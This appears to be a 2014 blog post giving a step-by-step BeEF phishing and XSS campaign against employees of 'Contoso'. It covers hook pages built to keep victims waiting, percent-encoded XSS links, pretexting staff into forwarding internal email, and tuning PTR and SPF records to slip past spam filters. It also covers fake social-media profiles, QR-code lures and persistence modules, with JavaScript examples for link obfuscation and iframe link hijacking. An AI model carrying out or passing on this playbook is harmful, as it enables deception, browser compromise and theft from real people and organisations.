BeEF: Browser Exploitation Framework - Preparing The Hook - TopicsExpress

Preparing The Hook

First, we set the hook on our phishing page. It should have the same anatomy as the original website (header, footer, side panes, CSS, etc.), served from our "secure" SSL-enabled phishing domain impersonating Contoso. We add a loading progress bar in the middle pane and put up a user-friendly message saying that the page might take some time to load. The progress bar advances with an exponentially decaying increment: each step adds less than the last, so the bar moves quickly at first and ever more slowly afterwards. The JavaScript below is an example of the progress code that can be used (the original sketch called a sleep() function, which does not exist in browser JavaScript; setInterval gives the same 100 ms pacing without freezing the page):

    // Progress bar that moves quickly at first and ever more slowly later.
    // The increment exp(-progress/3) shrinks exponentially, so in practice
    // the bar stalls well short of 100% and the visitor keeps waiting.
    // 'progress' is the assumed id of the bar element in the middle pane.
    var totalProgress = 100;
    var currentProgress = 1.0;
    var timer = setInterval(function () {
      currentProgress += Math.exp(currentProgress / -3);
      document.getElementById('progress').style.width = currentProgress + '%';
      if (currentProgress >= totalProgress) { clearInterval(timer); }
    }, 100);

By going fast at the beginning and slower towards the end, our hope is that the visitor feels encouraged and safe, and is less likely to close the page out of boredom. We even hope the user switches tabs, leaving this page "loading" in the background, giving us a longer window to hook the browser and do our BeEFy tricks.

Second, we prepare our XSS exploit link. The XSS JavaScript payload should inject BeEF's hook into the vulnerable page. The exploit link should rewrite the centre pane of the vulnerable page to remove any original content and add the loading progress bar, so that it looks identical to our phishing page. This decreases the probability of the victim noticing anything wrong and maximises the time they stay hooked. Furthermore, we can use some basic link obfuscation to trick savvy victims: force URL encoding of the whole value of the vulnerable parameter, including the readable text. For example, the query parameter

    search="<script src="test.js">

should look like:

    search=%22%3c%73%63%72%69%70%74%20%73%72%63%3d%22%74%65%73%74%2e%6a%73%22%3e

URL shortening services are also a good tool for hiding the main link. They are very common on social networks, especially Twitter.
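As an added example (not code from the original post), the encoding step described above in JavaScript: every byte of the parameter value is percent-encoded, readable text included, and the result is compared with what the browser's standard encoder would produce. The payload and the parameter name are the ones used above; the base URL is an assumption.

```javascript
// Added example, not from the original post: full percent-encoding of a
// query parameter value as a simple link obfuscation. The payload is the
// one from the text above; the base URL is hypothetical.

// Encode every byte of the UTF-8 form as %xx (two lowercase hex digits).
// encodeURIComponent would leave letters, digits and ".-_~" readable.
function encodeAllBytes(value) {
  const bytes = new TextEncoder().encode(value);
  let out = "";
  for (const b of bytes) {
    out += "%" + b.toString(16).padStart(2, "0");
  }
  return out;
}

// Assemble the exploit link: base URL, parameter name, fully encoded payload.
function obfuscatedLink(baseUrl, param, payload) {
  return baseUrl + "?" + param + "=" + encodeAllBytes(payload);
}

// Recover the value the vulnerable page sees after the browser/server
// URL-decodes the query string (the round trip must give the payload back).
function decodedParam(link, param) {
  return new URL(link).searchParams.get(param);
}

const PAYLOAD = '"<script src="test.js">';   // payload from the text above
const LINK = obfuscatedLink("https://www.example.com/search", "search", PAYLOAD);
```

Compare `encodeAllBytes(PAYLOAD)` with `encodeURIComponent(PAYLOAD)`: the latter yields `%22%3Cscript%20src%3D%22test.js%22%3E`, in which "script" and "test.js" are still plainly visible to anyone hovering over the link.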
Hooking Grounds

The first hooking ground we target is corporate email. We need to get our hands on a sample of Contoso's internal email to make our phishing emails look more convincing: we want to match the internal email anatomy (headers, fonts, text colours, signatures, etc.). This requires some more social engineering. We use our fictional profile to join the conversation about the sunglasses and ask for more details. Posing as a clueless new employee of Contoso, we receive a couple of responses explaining how the discount works. We take the discussion away from the public group into a private one-on-one conversation with the friendliest respondents, and ask them to forward the email to a non-corporate address under the ruse that our corporate email is not fully active yet. Bingo!

Now that we have the email, we craft a new one with the same anatomy as the sample, announcing the launch of a new football tournament. The email should appear to come from the sports committee and should have in the "To" field the same group name as the original discount email. In the body, we salute last year's winners and add their picture with the trophy for a more convincing flavour, reassuring people of the email's authenticity. And of course, we end the email with a "find out more" link that points to our hook. Since we have two hooking strategies, we split our targets into two sets. To one, we send links pointing to the phishing hook; to the other, links pointing to the XSS hook.

It is worth noting that we need to tweak our mail server while sending phishing emails, to make sure we do not end up in the recipients' spam folders. The server's hostname should be set to match the sending domain name. The reverse DNS (PTR) record for the server's IP should resolve back to the phishing domain. There should be an SPF record allowing the IP of our server to send email on behalf of the phishing domain. This is a good SPF record builder from Microsoft.
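As an added example (not from the original post, and not a real deliverability tool), the following JavaScript reproduces the hostname, PTR and SPF checks above the way a receiving mail filter applies them, over constructed DNS answers. All domain names, addresses and records are hypothetical; the IPs come from the RFC 5737 documentation ranges.

```javascript
// Added example, not from the original post: what a receiving mail filter
// checks about the sending server. DNS answers below are constructed;
// domains and IPs are hypothetical.

// Constructed DNS data standing in for real PTR and TXT lookups.
const DNS = {
  ptr: { "203.0.113.10": "mail.contoso-sports.example" },
  txt: { "contoso-sports.example": ["v=spf1 ip4:203.0.113.10 -all"] },
};

// Dotted IPv4 string to an unsigned 32-bit integer.
function ipv4ToInt(ip) {
  return ip.split(".").reduce((acc, octet) => acc * 256 + Number(octet), 0);
}

// Is ip inside the CIDR block? A bare address counts as /32.
function inCidr(ip, cidr) {
  const [net, bitsStr] = cidr.split("/");
  const bits = bitsStr === undefined ? 32 : Number(bitsStr);
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return ((ipv4ToInt(ip) & mask) >>> 0) === ((ipv4ToInt(net) & mask) >>> 0);
}

// Minimal SPF evaluation: "ip4:" mechanisms and the "all" catch-all, with
// the +, -, ~ and ? qualifiers. Returns "pass", "fail", "softfail" or "neutral".
// Mechanisms this toy does not know (a, mx, include, ...) are skipped.
function spfResult(record, ip) {
  const terms = record.trim().split(/\s+/);
  if (terms[0] !== "v=spf1") return "neutral";
  const verdict = { "+": "pass", "-": "fail", "~": "softfail", "?": "neutral" };
  for (const term of terms.slice(1)) {
    const qual = "+-~?".includes(term[0]) ? term[0] : "+";
    const mech = qual === term[0] ? term.slice(1) : term;
    let matched = false;
    if (mech === "all") matched = true;
    else if (mech.startsWith("ip4:")) matched = inCidr(ip, mech.slice(4));
    else continue;
    if (matched) return verdict[qual];
  }
  return "neutral";
}

// The three checks from the text: hostname matches reverse DNS, reverse DNS
// lands in the sending domain, and SPF authorises the IP for that domain.
function checkSender(ip, heloName, mailFromDomain, dns) {
  const ptr = dns.ptr[ip];
  const spf = (dns.txt[mailFromDomain] || []).find((r) => r.startsWith("v=spf1"));
  return {
    ptrMatchesHelo: ptr === heloName,
    ptrInDomain: ptr !== undefined &&
      (ptr === mailFromDomain || ptr.endsWith("." + mailFromDomain)),
    spf: spf ? spfResult(spf, ip) : "none",
  };
}
```

Run `checkSender("203.0.113.10", "mail.contoso-sports.example", "contoso-sports.example", DNS)` to see all three checks succeed; change the IP to one the SPF record does not list and the `-all` catch-all turns the SPF result into a hard fail, which is exactly the outcome the server tweaks above are meant to avoid.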
Make sure that the server's ISP IP blocks are not on any email spam blacklists. This is a handy free online blacklist checker. These are all common signals that mail filters check to identify spam.

The next hooking ground we target is social networking. We start by participating in group conversations and rants about the work environment, politics, etc., but never in a direct conversation, to keep our secret identity. Keeping our opinions with the flow also avoids controversial discussions that might trigger alarms. The goal of this phase is to get people familiar with our display names popping up in their news feeds, so they do not find it odd when a link is our first direct interaction. After a day or two of activity, we start the fun! We send a few buzzing words with a link to check the details. Buzzing social network announcements have to rely on a psychological need shared by a wide range of employees, which can be found from what people are saying about their company on Facebook and Twitter. At Contoso, based on what we found, we thought of a few good buzzing messages. On Twitter, we tweet "OMG! has resigned! Embarrassing video #screwContosoBoard" with retweets from different accounts. On Facebook, in the non-official group, we broadcast the following buzzing messages from different fake profiles, and maybe pick one of them to be shared on the walls of some of the fake profiles: "Big bonus for referral to this vacancy, do you know anyone?" and "Sign with us this petition to demand a salary raise. Be positive and we will make a difference!"

We might even get to the secret cow level if we combine social engineering with physical materials that link to the hook. Good examples include filling the streets near Contoso with stickers carrying a QR code of the XSS exploit link, and distributing ad-like flyers in front of Contoso's HQ with a short URL to the phishing page.

Adding Sinkers

Now that we have some people clicking links and getting hooked, we need to keep them hooked for as long as possible.
Our sinking strategy relies on social engineering in addition to some helper modules in BeEF. The greatest sinker of all is how we engineer the phishing/XSS pages to convince people to stay longer. As mentioned earlier, the progress bar is a good trick; combined with suitably entertaining animations, it does the job.

The pop-under module serves as a good persistence technique as well. We set it to auto-run (from its corresponding config.yaml) so that it runs whenever a user is hooked. The module attempts to open a small pop-under window to keep the browser hooked even if the user closes the main tab. Be careful, though: this is sometimes blocked by pop-up blockers.

We also want to use the man-in-the-browser module, and we set this to auto-run as well. It ensures that whenever the zombie clicks on any link on the phishing page, the next page is still hooked. Someone would have to manually type a new address in the address bar to get away from our hook.

Finally, we use the frame-above module, which is the best option for persistence when dealing with IE. It rewrites all links on the webpage to spawn a 100% by 100% iframe whose source is the selected link, allowing ultra persistence. Michele "antisnatchor" Orru, BeEF's lead core developer, talked about an ultra cool way to automate the whole process at AthCon 2012 and even created a Ruby script that uses BeEF's latest REST API to do Java 1.6.0u27 mass pwnage!
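As an added example (not BeEF's own module code), here is the frame-above idea from the last paragraph in plain JavaScript, which also illustrates the man-in-the-browser goal of keeping the next page hooked: every link on the page is rewritten so that a click loads its target inside a full-window iframe, while the top document, where the hook script lives, stays alive. Running it on a real page is assumed to happen via `installFrameAbove(document, document.location.href)`; the page markup and the hook itself are not shown.

```javascript
// Added example, not BeEF's module code: frame-above style link rewriting.
// Clicks on ordinary links load the target in a 100% x 100% iframe instead
// of navigating, so the hooked top document (assumed to carry the hook
// script) keeps running. Page markup is assumed, not part of the example.

// Resolve a link's href against the current page, as the browser would.
function resolveTarget(href, baseUrl) {
  return new URL(href, baseUrl).toString();
}

// Only http(s) navigations are framed; javascript:, mailto: and similar
// targets are left alone because framing them breaks the page or is pointless.
function isFrameable(target) {
  return /^https?:/i.test(target);
}

// Rewrite every <a href> in doc. Returns how many links were taken over.
function installFrameAbove(doc, baseUrl) {
  let framed = 0;
  doc.querySelectorAll("a[href]").forEach((link) => {
    const target = resolveTarget(link.getAttribute("href"), baseUrl);
    if (!isFrameable(target)) return;
    framed += 1;
    link.addEventListener("click", (event) => {
      event.preventDefault();                 // cancel the real navigation
      const frame = doc.createElement("iframe");
      frame.src = target;                     // the page the victim wanted
      frame.style.cssText =
        "position:fixed;top:0;left:0;width:100%;height:100%;border:0;z-index:2147483647;";
      doc.body.appendChild(frame);            // layered over the hooked page
    });
  });
  return framed;
}

// In a browser, take over the current page's links; harmless elsewhere.
if (typeof document !== "undefined") {
  installFrameAbove(document, document.location.href);
}
```

The address bar keeps showing the hooked page's URL while the victim browses inside the frame, which is why the text notes that only typing a new address by hand escapes the hook; sites that send X-Frame-Options or a frame-ancestors CSP directive will refuse to load in the iframe, so those links simply show a blank frame.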
Posted on: Mon, 03 Feb 2014 11:23:01 +0000
